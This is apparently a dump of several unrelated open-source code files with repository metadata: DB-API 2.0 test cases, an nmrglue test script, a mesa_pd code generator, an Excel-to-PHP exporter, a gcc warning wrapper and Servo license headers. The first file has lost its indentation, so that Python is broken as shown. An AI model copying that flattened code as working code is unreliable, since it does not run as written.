self.assertEqual(len(booze),1)
self.assertEqual(len(booze[0]),1)
self.assertEqual(booze[0][0],'Victoria Bitter')
finally:
con.close()
def test_description(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.description,None,
'cursor.description should be none after executing a '
'statement that can return no rows (such as DDL)'
)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(len(cur.description),1,
'cursor.description describes too many columns'
)
self.assertEqual(len(cur.description[0]),7,
'cursor.description[x] tuples must have 7 elements'
)
self.assertEqual(cur.description[0][0].lower(),'name',
'cursor.description[x][0] must return column name'
)
self.assertEqual(cur.description[0][1],self.driver.STRING,
'cursor.description[x][1] must return column type. Got %r'
% cur.description[0][1]
)
# Make sure self.description gets reset
self.executeDDL2(cur)
self.assertEqual(cur.description,None,
'cursor.description not being set to None when executing '
'no-result statements (eg. DDL)'
)
finally:
con.close()
def test_rowcount(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount should be -1 after executing no-result '
'statements'
)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1),
                'cursor.rowcount should == number of rows inserted, or '
'set to -1 after executing an insert statement'
)
cur.execute("select name from %sbooze" % self.table_prefix)
self.failUnless(cur.rowcount in (-1,1),
'cursor.rowcount should == number of rows returned, or '
'set to -1 after executing a select statement'
)
self.executeDDL2(cur)
self.assertEqual(cur.rowcount,-1,
'cursor.rowcount not being reset to -1 after executing '
'no-result statements'
)
finally:
con.close()
lower_func = 'lower'
def test_callproc(self):
con = self._connect()
try:
cur = con.cursor()
if self.lower_func and hasattr(cur,'callproc'):
r = cur.callproc(self.lower_func,('FOO',))
self.assertEqual(len(r),1)
self.assertEqual(r[0],'FOO')
r = cur.fetchall()
self.assertEqual(len(r),1,'callproc produced no result set')
self.assertEqual(len(r[0]),1,
'callproc produced invalid result set'
)
self.assertEqual(r[0][0],'foo',
'callproc produced invalid results'
)
finally:
con.close()
def test_close(self):
con = self._connect()
try:
cur = con.cursor()
finally:
con.close()
# cursor.execute should raise an Error if called after connection
# closed
self.assertRaises(self.driver.Error,self.executeDDL1,cur)
        # connection.commit should raise an Error if called after connection
        # closed.
self.assertRaises(self.driver.Error,con.commit)
# connection.close should raise an Error if called more than once
self.assertRaises(self.driver.Error,con.close)
def test_execute(self):
con = self._connect()
try:
cur = con.cursor()
self._paraminsert(cur)
finally:
con.close()
def _paraminsert(self,cur):
self.executeDDL1(cur)
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.failUnless(cur.rowcount in (-1,1))
if self.driver.paramstyle == 'qmark':
cur.execute(
'insert into %sbooze values (?)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'numeric':
cur.execute(
'insert into %sbooze values (:1)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'named':
cur.execute(
'insert into %sbooze values (:beer)' % self.table_prefix,
{'beer':"Cooper's"}
)
elif self.driver.paramstyle == 'format':
cur.execute(
'insert into %sbooze values (%%s)' % self.table_prefix,
("Cooper's",)
)
elif self.driver.paramstyle == 'pyformat':
cur.execute(
'insert into %sbooze values (%%(beer)s)' % self.table_prefix,
{'beer':"Cooper's"}
)
else:
self.fail('Invalid paramstyle')
self.failUnless(cur.rowcount in (-1,1))
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,'cursor.fetchall returned too few rows')
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Cooper's",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
self.assertEqual(beers[1],"Victoria Bitter",
'cursor.fetchall retrieved incorrect data, or data inserted '
'incorrectly'
)
def test_executemany(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
largs = [ ("Cooper's",) , ("Boag's",) ]
margs = [ {'beer': "Cooper's"}, {'beer': "Boag's"} ]
if self.driver.paramstyle == 'qmark':
cur.executemany(
'insert into %sbooze values (?)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'numeric':
cur.executemany(
'insert into %sbooze values (:1)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'named':
cur.executemany(
'insert into %sbooze values (:beer)' % self.table_prefix,
margs
)
elif self.driver.paramstyle == 'format':
cur.executemany(
'insert into %sbooze values (%%s)' % self.table_prefix,
largs
)
elif self.driver.paramstyle == 'pyformat':
cur.executemany(
'insert into %sbooze values (%%(beer)s)' % (
self.table_prefix
),
margs
)
else:
self.fail('Unknown paramstyle')
self.failUnless(cur.rowcount in (-1,2),
'insert using cursor.executemany set cursor.rowcount to '
'incorrect value %r' % cur.rowcount
)
cur.execute('select name from %sbooze' % self.table_prefix)
res = cur.fetchall()
self.assertEqual(len(res),2,
'cursor.fetchall retrieved incorrect number of rows'
)
beers = [res[0][0],res[1][0]]
beers.sort()
self.assertEqual(beers[0],"Boag's",'incorrect data retrieved')
self.assertEqual(beers[1],"Cooper's",'incorrect data retrieved')
finally:
con.close()
def test_fetchone(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchone should raise an Error if called before
# executing a select-type query
self.assertRaises(self.driver.Error,cur.fetchone)
# cursor.fetchone should raise an Error if called after
            # executing a query that cannot return rows
self.executeDDL1(cur)
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if a query retrieves '
'no rows'
)
self.failUnless(cur.rowcount in (-1,0))
# cursor.fetchone should raise an Error if called after
            # executing a query that cannot return rows
cur.execute("insert into %sbooze values ('Victoria Bitter')" % (
self.table_prefix
))
self.assertRaises(self.driver.Error,cur.fetchone)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchone()
self.assertEqual(len(r),1,
'cursor.fetchone should have retrieved a single row'
)
self.assertEqual(r[0],'Victoria Bitter',
'cursor.fetchone retrieved incorrect data'
)
self.assertEqual(cur.fetchone(),None,
'cursor.fetchone should return None if no more rows available'
)
self.failUnless(cur.rowcount in (-1,1))
finally:
con.close()
samples = [
'Carlton Cold',
'Carlton Draft',
'Mountain Goat',
'Redback',
'Victoria Bitter',
'XXXX'
]
def _populate(self):
''' Return a list of sql commands to setup the DB for the fetch
tests.
'''
populate = [
"insert into %sbooze values ('%s')" % (self.table_prefix,s)
for s in self.samples
]
return populate
def test_fetchmany(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchmany should raise an Error if called without
            # issuing a query
self.assertRaises(self.driver.Error,cur.fetchmany,4)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany()
self.assertEqual(len(r),1,
'cursor.fetchmany retrieved incorrect number of rows, '
'default of arraysize is one.'
)
cur.arraysize=10
r = cur.fetchmany(3) # Should get 3 rows
self.assertEqual(len(r),3,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should get 2 more
self.assertEqual(len(r),2,
'cursor.fetchmany retrieved incorrect number of rows'
)
r = cur.fetchmany(4) # Should be an empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence after '
'results are exhausted'
)
self.failUnless(cur.rowcount in (-1,6))
# Same as above, using cursor.arraysize
cur.arraysize=4
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchmany() # Should get 4 rows
self.assertEqual(len(r),4,
'cursor.arraysize not being honoured by fetchmany'
)
r = cur.fetchmany() # Should get 2 more
self.assertEqual(len(r),2)
r = cur.fetchmany() # Should be an empty sequence
self.assertEqual(len(r),0)
self.failUnless(cur.rowcount in (-1,6))
cur.arraysize=6
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchmany() # Should get all rows
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows),6)
rows = [r[0] for r in rows]
rows.sort()
# Make sure we get the right data back out
for i in range(0,6):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved by cursor.fetchmany'
)
rows = cur.fetchmany() # Should return an empty list
self.assertEqual(len(rows),0,
'cursor.fetchmany should return an empty sequence if '
'called after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,6))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
r = cur.fetchmany() # Should get empty sequence
self.assertEqual(len(r),0,
'cursor.fetchmany should return an empty sequence if '
'query retrieved no rows'
)
self.failUnless(cur.rowcount in (-1,0))
finally:
con.close()
def test_fetchall(self):
con = self._connect()
try:
cur = con.cursor()
# cursor.fetchall should raise an Error if called
# without executing a query that may return rows (such
# as a select)
self.assertRaises(self.driver.Error, cur.fetchall)
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
# cursor.fetchall should raise an Error if called
            # after executing a statement that cannot return rows
self.assertRaises(self.driver.Error,cur.fetchall)
cur.execute('select name from %sbooze' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.assertEqual(len(rows),len(self.samples),
'cursor.fetchall did not retrieve all rows'
)
rows = [r[0] for r in rows]
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'cursor.fetchall retrieved incorrect rows'
)
rows = cur.fetchall()
self.assertEqual(
len(rows),0,
'cursor.fetchall should return an empty list if called '
'after the whole result set has been fetched'
)
self.failUnless(cur.rowcount in (-1,len(self.samples)))
self.executeDDL2(cur)
cur.execute('select name from %sbarflys' % self.table_prefix)
rows = cur.fetchall()
self.failUnless(cur.rowcount in (-1,0))
self.assertEqual(len(rows),0,
'cursor.fetchall should return an empty list if '
'a select query returns no rows'
)
finally:
con.close()
def test_mixedfetch(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
cur.execute('select name from %sbooze' % self.table_prefix)
rows1 = cur.fetchone()
rows23 = cur.fetchmany(2)
rows4 = cur.fetchone()
rows56 = cur.fetchall()
self.failUnless(cur.rowcount in (-1,6))
self.assertEqual(len(rows23),2,
'fetchmany returned incorrect number of rows'
)
self.assertEqual(len(rows56),2,
'fetchall returned incorrect number of rows'
)
rows = [rows1[0]]
rows.extend([rows23[0][0],rows23[1][0]])
rows.append(rows4[0])
rows.extend([rows56[0][0],rows56[1][0]])
rows.sort()
for i in range(0,len(self.samples)):
self.assertEqual(rows[i],self.samples[i],
'incorrect data retrieved or inserted'
)
finally:
con.close()
def help_nextset_setUp(self,cur):
''' Should create a procedure called deleteme
that returns two result sets, first the
number of rows in booze then "name from booze"
'''
raise NotImplementedError('Helper not implemented')
#sql="""
# create procedure deleteme as
# begin
# select count(*) from booze
# select name from booze
# end
#"""
#cur.execute(sql)
def help_nextset_tearDown(self,cur):
'If cleaning up is needed after nextSetTest'
raise NotImplementedError('Helper not implemented')
#cur.execute("drop procedure deleteme")
def test_nextset(self):
con = self._connect()
try:
cur = con.cursor()
if not hasattr(cur,'nextset'):
return
try:
self.executeDDL1(cur)
for sql in self._populate():
cur.execute(sql)
self.help_nextset_setUp(cur)
cur.callproc('deleteme')
numberofrows=cur.fetchone()
assert numberofrows[0]== len(self.samples)
assert cur.nextset()
names=cur.fetchall()
assert len(names) == len(self.samples)
s=cur.nextset()
assert s == None,'No more return sets, should return None'
finally:
self.help_nextset_tearDown(cur)
finally:
con.close()
def test_nextset(self):
raise NotImplementedError('Drivers need to override this test')
def test_arraysize(self):
# Not much here - rest of the tests for this are in test_fetchmany
con = self._connect()
try:
cur = con.cursor()
self.failUnless(hasattr(cur,'arraysize'),
'cursor.arraysize must be defined'
)
finally:
con.close()
def test_setinputsizes(self):
con = self._connect()
try:
cur = con.cursor()
cur.setinputsizes( (25,) )
self._paraminsert(cur) # Make sure cursor still works
finally:
con.close()
def test_setoutputsize_basic(self):
# Basic test is to make sure setoutputsize doesn't blow up
con = self._connect()
try:
cur = con.cursor()
cur.setoutputsize(1000)
cur.setoutputsize(2000,0)
self._paraminsert(cur) # Make sure the cursor still works
finally:
con.close()
def test_setoutputsize(self):
        # Real test for setoutputsize is driver dependent
        raise NotImplementedError('Drivers need to override this test')
def test_None(self):
con = self._connect()
try:
cur = con.cursor()
self.executeDDL1(cur)
cur.execute('insert into %sbooze values (NULL)' % self.table_prefix)
cur.execute('select name from %sbooze' % self.table_prefix)
r = cur.fetchall()
self.assertEqual(len(r),1)
self.assertEqual(len(r[0]),1)
self.assertEqual(r[0][0],None,'NULL value not returned as None')
finally:
con.close()
def test_Date(self):
d1 = self.driver.Date(2002,12,25)
d2 = self.driver.DateFromTicks(time.mktime((2002,12,25,0,0,0,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(d1),str(d2))
def test_Time(self):
t1 = self.driver.Time(13,45,30)
t2 = self.driver.TimeFromTicks(time.mktime((2001,1,1,13,45,30,0,0,0)))
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Timestamp(self):
t1 = self.driver.Timestamp(2002,12,25,13,45,30)
t2 = self.driver.TimestampFromTicks(
time.mktime((2002,12,25,13,45,30,0,0,0))
)
# Can we assume this? API doesn't specify, but it seems implied
# self.assertEqual(str(t1),str(t2))
def test_Binary(self):
b = self.driver.Binary('Something')
b = self.driver.Binary('')
def test_STRING(self):
self.failUnless(hasattr(self.driver,'STRING'),
'module.STRING must be defined'
)
def test_BINARY(self):
self.failUnless(hasattr(self.driver,'BINARY'),
'module.BINARY must be defined.'
)
def test_NUMBER(self):
self.failUnless(hasattr(self.driver,'NUMBER'),
'module.NUMBER must be defined.'
)
def test_DATETIME(self):
self.failUnless(hasattr(self.driver,'DATETIME'),
'module.DATETIME must be defined.'
)
def test_ROWID(self):
self.failUnless(hasattr(self.driver,'ROWID'),
'module.ROWID must be defined.'
)
|
d33tah/bpgsql
|
tests/dbapi20.py
|
Python
|
lgpl-2.1
| 31,413 | 0.010251 |
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from . import test_ui
|
Vauxoo/e-commerce
|
website_sale_require_legal/tests/__init__.py
|
Python
|
agpl-3.0
| 88 | 0 |
from survey.management.commands.import_location import Command
__all__ = ['']
|
antsmc2/mics
|
survey/management/commands/__init__.py
|
Python
|
bsd-3-clause
| 77 | 0.012987 |
# -*- coding: utf-8 -*-
from mesa_pd.accessor import create_access
from mesa_pd.utility import generate_file
def create_property(name, type, defValue=""):
"""
Parameters
----------
name : str
name of the property
type : str
type of the property
defValue : str
default value the property should be initialized with
"""
return {'name': name, 'type': type, 'defValue': defValue}
class HCSITSRelaxationStep():
def __init__(self):
self.context = {'properties': [], 'interface': []}
self.context['properties'].append(create_property("maxSubIterations", "size_t", defValue="20"))
self.context['properties'].append(
create_property("relaxationModel", "RelaxationModel", defValue="InelasticFrictionlessContact"))
self.context['properties'].append(create_property("deltaMax", "real_t", defValue="0"))
self.context['properties'].append(create_property("cor", "real_t", defValue="real_t(0.2)"))
self.context['interface'].append(create_access("uid", "walberla::id_t", access="g"))
self.context['interface'].append(create_access("position", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("linearVelocity", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("angularVelocity", "walberla::mesa_pd::Vec3", access="g"))
self.context['interface'].append(create_access("invMass", "walberla::real_t", access="g"))
self.context['interface'].append(create_access("invInertia", "walberla::mesa_pd::Mat3", access="g"))
self.context['interface'].append(create_access("dv", "walberla::mesa_pd::Vec3", access="gr"))
self.context['interface'].append(create_access("dw", "walberla::mesa_pd::Vec3", access="gr"))
def generate(self, module):
ctx = {'module': module, **self.context}
generate_file(module['module_path'], 'kernel/HCSITSRelaxationStep.templ.h', ctx)
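# A minimal usage sketch (illustrative only, not part of the walberla sources).
# generate() reads module['module_path'] for the output location and passes the
# whole module dict into the template context; any other keys shown here are
# assumptions for demonstration.
#
#   if __name__ == '__main__':
#       gen = HCSITSRelaxationStep()
#       gen.generate({'name': 'mesa_pd', 'module_path': 'src/mesa_pd'})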
|
lssfau/walberla
|
python/mesa_pd/kernel/HCSITSRelaxationStep.py
|
Python
|
gpl-3.0
| 2,010 | 0.006468 |
#! /usr/bin/env python
""" Create files for shuf unit test """
import nmrglue.fileio.pipe as pipe
import nmrglue.process.pipe_proc as p
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="ri2c")
pipe.write("shuf1.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="c2ri")
pipe.write("shuf2.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="ri2rr")
pipe.write("shuf3.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="exlr")
pipe.write("shuf4.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="rolr")
pipe.write("shuf5.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="swap")
pipe.write("shuf6.glue", d, a, overwrite=True)
d, a = pipe.read("time_complex.fid")
d, a = p.shuf(d, a, mode="inv")
pipe.write("shuf7.glue", d, a, overwrite=True)
|
atomman/nmrglue
|
tests/pipe_proc_tests/shuf.py
|
Python
|
bsd-3-clause
| 963 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from core.base_processor import xBaseProcessor
from utilities.export_helper import xExportHelper
from utilities.file_utility import xFileUtility
from definitions.constant_data import xConstantData
class xProcessorPhp(xBaseProcessor) :
def __init__(self, p_strSuffix, p_strConfig) :
return super(xProcessorPhp, self).__init__('PHP', p_strSuffix, p_strConfig)
def ProcessExport(self, p_strWorkbookName, p_cWorkbook, p_cWorkSheet, p_mapExportConfigs, p_mapDatabaseConfigs, p_mapIndexSheetConfigs, p_mapDataSheetConfigs, p_mapPreloadDataMaps, p_nCategoryLevel) :
        print('>>>>> Processing worksheet [{0}] => [{1}]'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
strExportDirectory = self.GetExportDirectory(p_mapExportConfigs)
self.PrepareExportDirectory(strExportDirectory)
lstCategoryLevelColumnIndexIndexs = self.GetCategoryLevelColumnIndexList(p_nCategoryLevel, self.Config, p_mapExportConfigs, p_mapDataSheetConfigs)
mapGenerateControl = { }
mapGenerateControl['level_index'] = 0
mapGenerateControl['ident'] = '\t'
strContent = ''
strContent += '<?php\n'
strContent += '\n'
strContent += '// ////////////////////////////////////////////////////////////////////////////////////////////\n'
strContent += '// \n'
strContent += '// {0}\n'.format(self.GetCopyrightString(p_mapExportConfigs['COPYRIGHT']['ORGANIZATION'], p_mapExportConfigs['COPYRIGHT']['SINCE_YEAR']))
strContent += '// \n'
strContent += '// Create By : {0}\n'.format(self.GetAuthorString())
strContent += '// \n'
strContent += '// Description : {0}\n'.format(p_cWorkSheet.title)
strContent += '// \n'
strContent += '// ////////////////////////////////////////////////////////////////////////////////////////////\n'
strContent += '\n'
strContent += 'return array('
strContent += self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mapPreloadDataMaps, lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, mapGenerateControl)
strContent += '\n'
strContent += ');\n'
strContent += '\n'
strContent += '// end\n'
strFileName = '{0}.{1}'.format(p_mapIndexSheetConfigs['DATA_FILE_NAME'], self.Suffix.lower())
strFilePath = os.path.join(strExportDirectory, strFileName)
xFileUtility.DeleteFile(strFilePath)
bSuccess = xFileUtility.WriteDataToFile(strFilePath, 'w', strContent)
if bSuccess :
            print('>>>>> Worksheet [{0}] => [{1}] processed successfully!'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
        else :
            print('>>>>> Worksheet [{0}] => [{1}] processing failed!'.format(p_mapIndexSheetConfigs['DATA_SHEET'], self.Type.lower()))
return bSuccess
def __ConvertPHPContent(self, p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas, p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl) :
if type(p_mixPreloadDatas) == dict and p_mixPreloadDatas.has_key('datas') :
return self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas['datas'], p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl)
if type(p_mixPreloadDatas) == dict :
strContent = ''
p_mapGenerateControl['level_index'] += 1
for mixKey in p_mixPreloadDatas :
if mixKey is None :
continue
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
strKey = '{0}'.format(mixKey)
strKey = strKey.replace('\'', '\\\\\'')
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[p_lstCategoryLevelColumnIndexIndexs[p_mapGenerateControl['level_index'] - 1]][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strContent += '\'{0}\' => array('.format(strKey)
else :
strContent += '{0} => array('.format(strKey)
strContent += self.__ConvertPHPContent(p_mapExportConfigs, p_mapDataSheetConfigs, p_mixPreloadDatas[mixKey], p_lstCategoryLevelColumnIndexIndexs, p_nCategoryLevel, p_mapGenerateControl)
if p_mapGenerateControl['level_index'] < len(p_lstCategoryLevelColumnIndexIndexs) :
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
if type(p_mixPreloadDatas[mixKey]) == list and len(p_mixPreloadDatas[mixKey]) > 1 :
strContent += '\n{0}'.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'], p_mapGenerateControl['ident']))
strContent += '),'
p_mapGenerateControl['level_index'] -= 1
return strContent
if type(p_mixPreloadDatas) == list :
nPreloadDataSize = len(p_mixPreloadDatas)
strContent = ''
for mapLineDatas in p_mixPreloadDatas :
nDataColumnIndex = 0
if self.IsEmptyLine(mapLineDatas) :
nPreloadDataSize -= 1
continue
if nPreloadDataSize > 1 :
strContent += '\n{0}array('.format(self.GenerateIdentIdentifier(p_mapGenerateControl['level_index'] + 1, p_mapGenerateControl['ident']))
for nColumnIndex in p_mapDataSheetConfigs :
if not xExportHelper.IsDataSheetColumnLanguageAvailable(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_LANGUAGE_CODE], self.Config, p_mapExportConfigs) :
continue
if not xExportHelper.IsDataSheetColumnExportTypeAvailable(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_EXPORT_IDENTIFIER], self.Config, p_mapExportConfigs) :
continue
# if p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_AUTO_INCREMENT_IDENTIFIER] is not None :
# continue
strCellValue = ''
strFieldName = xExportHelper.GetFieldNameAsI18N(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_FIELD], p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_LANGUAGE_CODE], self.Config, p_mapExportConfigs)
if mapLineDatas[strFieldName] is None :
if p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DEFAULT_VALUE] is not None :
strCellValue = '{0}'.format(p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DEFAULT_VALUE])
else :
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strCellValue = ''
else :
strCellValue = '0'
else :
strCellValue = '{0}'.format(mapLineDatas[strFieldName])
strCellValue = strCellValue.replace('\'', '\\\\\'')
if nDataColumnIndex > 0 :
strContent += ' '
if xConstantData.MYSQL_DATA_DEFINITIONS[p_mapDataSheetConfigs[nColumnIndex][xConstantData.DATA_SHEET_ROW_DATA_TYPE].upper()]['IS_STRING'] :
strContent += '\'{0}\' => \'{1}\','.format(strFieldName, strCellValue)
else :
strContent += '\'{0}\' => {1},'.format(strFieldName, strCellValue)
nDataColumnIndex += 1
if nPreloadDataSize > 1 :
strContent += '),'
return strContent
|
xLemon/xExcelConvertor
|
excel_convertor/processors/processor_php.py
|
Python
|
mit
| 7,054 | 0.026398 |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"alignment.c:327",
"inet_hashtables.h:356",
"mmu.c:602",
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, so we can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
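# Illustrative example (not from the original script): a compiler line such as
#   "drivers/net/foo.c:123:7: warning: unused variable 'x'"
# matches warning_re with group(2) == "foo.c:123"; since that key is not in
# allowed_warnings, interpret_warning() removes the object file (if one was
# named with -o) and exits with status 1.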
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
|
htc-msm8960/android_kernel_htc_msm8930
|
scripts/gcc-wrapper.py
|
Python
|
gpl-2.0
| 3,965 | 0.002774 |
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# These licenses are valid for use in Servo
licenses = [
"""\
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
""",
"""\
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
""",
"""\
// This Source Code Form is subject to the terms of the Mozilla Public
// License, v. 2.0. If a copy of the MPL was not distributed with this
// file, You can obtain one at http://mozilla.org/MPL/2.0/.
""",
"""\
// Copyright 2013 The Servo Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
""",
"""\
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
